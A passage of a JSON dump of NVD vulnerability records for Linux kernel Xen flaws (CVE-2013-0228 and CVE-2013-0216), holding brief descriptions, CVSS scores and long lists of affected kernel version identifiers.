"cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:35", "description": "The xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel before 3.7.9 on 32-bit Xen paravirt_ops platforms does not properly handle an invalid value in the DS segment register, which allows guest OS users to gain guest OS privileges via a crafted application.", "edition": 5, "cvss3": {}, "published": "2013-03-01T12:37:00", "title": "CVE-2013-0228", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0228"], "modified": "2013-08-22T06:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-0228", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0228", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:35", "description": "The Xen netback functionality in the Linux kernel before 3.7.8 allows guest OS users to cause a denial of service (loop) by triggering ring pointer corruption.", "edition": 5, "cvss3": {}, "published": "2013-02-18T04:41:00", "title": "CVE-2013-0216", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 5.2, "vectorString": "AV:A/AC:M/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0216"], "modified": "2013-08-22T06:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", 